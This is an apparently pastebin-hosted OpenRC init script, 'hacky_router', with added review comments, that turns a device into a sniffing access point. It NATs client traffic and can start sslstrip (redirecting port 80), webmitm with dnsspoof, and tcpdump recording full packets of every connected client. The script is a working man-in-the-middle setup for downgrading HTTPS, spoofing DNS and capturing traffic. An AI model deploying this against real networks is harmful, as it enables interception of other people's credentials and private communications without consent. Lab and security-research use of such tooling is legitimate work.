tux_mind

hacky_router

Apr 6th, 2013
  1. #!/sbin/runscript
  # Configuration is read from /etc/conf.d/$(basename $0):
  #   IF_SERVER   - the server interface (the one accepting client connections)
  #   IF_CLIENT   - the client interface (the one connected to the internet)
  #   ssl_handler - webmitm, sslstrip, or nothing
  # A fuller explanation is in the author's post:
  # http://lifeinarootshell.blogspot.it/2013/04/tf201-as-sniffbox.html
  #
  # Register the clear() function defined below as an extra OpenRC command.
  extra_commands="clear"
  8.  
  # OpenRC dependency hook: declares that hostapd and dhcpd are needed by
  # this service.
  depend() {
    need hostapd dhcpd
  }
  13.  
  # Empty the filter and nat tables: first flush all rules (-F), then delete
  # all user-defined chains (-X), filter table before nat each time.
  #
  # NOTE(review): this is not limited to rules added by this script. Any
  # firewall rules already loaded in these two tables on the host are removed
  # as well, and nothing here restores them. Chain policies and the other
  # tables are left as they are.
  flush() {
    local action
    for action in -F -X; do
      iptables "$action"
      iptables -t nat "$action"
    done
  }
  21.  
  # Extra command: delete everything the glob matches in /var/lib/tcpdump
  # and report the rm status through eend.
  #
  # NOTE(review): the capture files hold full packets from every client, so
  # treat them as sensitive. rm only unlinks them (no secure erase), and the
  # '*' glob skips dotfiles.
  clear() {
    local rc
    ebegin "Clearing /var/lib/tcpdump directory"
    rm -rf /var/lib/tcpdump/*
    rc=$?
    eend "$rc"
  }
  28.  
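  # Bring the router up: NAT traffic from IF_SERVER (client-facing) out of
  # IF_CLIENT (uplink), start the handler selected by ssl_handler, and record
  # the traffic seen on IF_SERVER with tcpdump.
  #
  # Globals read: IF_SERVER, IF_CLIENT, ssl_handler (from /etc/conf.d).
  # Returns: 1, before any firewall change, when IF_SERVER or IF_CLIENT is
  #          empty; otherwise the status of the final einfo call.
  #
  # NOTE(review): flush removes every existing filter/nat rule on the host and
  # IPv4 forwarding is switched on globally, so run this only on a dedicated
  # box. The per-daemon eend results are reported but do not abort the start.
  start()
  {
     local use_dnsspoof="no"

     # Validate the config before flush, so a missing variable cannot wipe the
     # firewall and then leave half-built rules behind.
     if [ -z "$IF_SERVER" ] || [ -z "$IF_CLIENT" ]; then
        eerror "IF_SERVER and IF_CLIENT must be set in /etc/conf.d"
        return 1
     fi

     flush
     echo 1 > /proc/sys/net/ipv4/ip_forward
     # Masquerade on the uplink; accept client-originated forwarding and the
     # related/established return traffic. The FORWARD policy is not set here.
     iptables -t nat -A POSTROUTING -o "$IF_CLIENT" -j MASQUERADE
     iptables -A FORWARD -i "$IF_CLIENT" -o "$IF_SERVER" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
     iptables -A FORWARD -o "$IF_CLIENT" -i "$IF_SERVER" -j ACCEPT

     case "$ssl_handler" in
        webmitm)
           ebegin "Starting webmitm"
           start-stop-daemon --start -b -d /etc/webmitm --exec /usr/sbin/webmitm -- -d
           eend $?
           use_dnsspoof="yes"
           ;;
        sslstrip)
           ebegin "Starting sslstrip"
           iptables -t nat -A PREROUTING -i "$IF_SERVER" -p tcp --destination-port 80 -j REDIRECT --to-port 10000
           start-stop-daemon -b --start -m -p /var/run/sslstrip.pid python /usr/lib/sslstrip/sslstrip.py -- -kw /dev/null
           eend $?
           ;;
        *)
           einfo "sniffing raw traffic."
           ;;
     esac

     # '=' instead of '==': the latter is not a POSIX test operator and fails
     # when the init script is run by a shell other than bash.
     if [ "$use_dnsspoof" = "yes" ]; then
        ebegin "Starting dnsspoof"
        start-stop-daemon --start -b --exec /usr/sbin/dnsspoof -- -i "$IF_SERVER"
        eend $?
     else
        # Don't waste time finding the current DNS servers; send client
        # UDP/53 queries to Google's public resolver.
        iptables -t nat -I PREROUTING -i "$IF_SERVER" -p udp --destination-port 53 -j DNAT --to 8.8.8.8
     fi

     ebegin "Starting tcpdump"
     # NOTE(review): -w is a relative path; the message below says the files
     # land in /var/lib/tcpdump, presumably via tcpdump's own working
     # directory or chroot. Confirm, and keep that directory root-only, since
     # -s0 stores complete packets.
     start-stop-daemon --start -b --exec /usr/sbin/tcpdump -- -nps0 -i "$IF_SERVER" -w "$(date +%d-%m-%Y_%H-%M).cap" -C 10
     eend $?
     einfo sniff files will be in /var/lib/tcpdump folder
  }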
  67.  
  # Tear the router down: flush the firewall, turn IPv4 forwarding off, then
  # stop whichever helper daemons the configured ssl_handler started, and
  # finally tcpdump.
  #
  # Globals read: ssl_handler.
  # Returns: the status of the final eend (the tcpdump stop).
  #
  # NOTE(review): forwarding is set to 0 regardless of its value before
  # start(), and flush leaves the filter/nat tables empty rather than
  # restoring whatever rules the host had.
  stop()
  {
     flush
     echo 0 > /proc/sys/net/ipv4/ip_forward

     if [ "$ssl_handler" = "webmitm" ]; then
        ebegin "Stopping webmitm"
        start-stop-daemon --stop --exec /usr/sbin/webmitm
        eend $?
        # dnsspoof is only started alongside webmitm, so it is stopped here.
        ebegin "Stopping dnsspoof"
        start-stop-daemon --stop --exec /usr/sbin/dnsspoof
        eend $?
     elif [ "$ssl_handler" = "sslstrip" ]; then
        ebegin "Stopping sslstrip"
        start-stop-daemon --stop -p /var/run/sslstrip.pid
        eend $?
     fi

     ebegin "Stopping tcpdump"
     start-stop-daemon --stop --exec /usr/sbin/tcpdump
     eend $?
  }